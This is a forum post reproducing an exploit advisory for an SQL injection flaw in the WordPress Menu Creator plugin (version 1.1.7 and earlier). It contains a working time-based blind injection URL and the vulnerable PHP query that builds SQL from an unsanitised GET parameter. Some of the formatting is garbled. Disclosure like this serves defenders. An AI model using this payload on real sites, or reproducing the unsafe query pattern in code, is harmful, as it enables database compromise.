Menu Creator Vulnerability
-
# Exploit Title: WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: https://downloads.www.ads-software.com/plugin/wp-menu-creator.1.1.7.zip
# Version: 1.1.7 (tested)—
PoC
—
https://www.site.com/wp-content/plugins/wp-menu-creator/updateSortOrder.php?menu_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)—————
Vulnerable code
—————
$menu_id = $_GET[‘menu_id’];
…
$first_item = $wpdb->get_row(“SELECT * FROM ” . $wpdb->prefix.”menuitems WHEREorder
=0 ANDparent
=0 AND menu = $menu_id”);https://www.ads-software.com/extend/plugins/wp-menu-creator/
- The topic ‘Menu Creator Vulnerability’ is closed to new replies.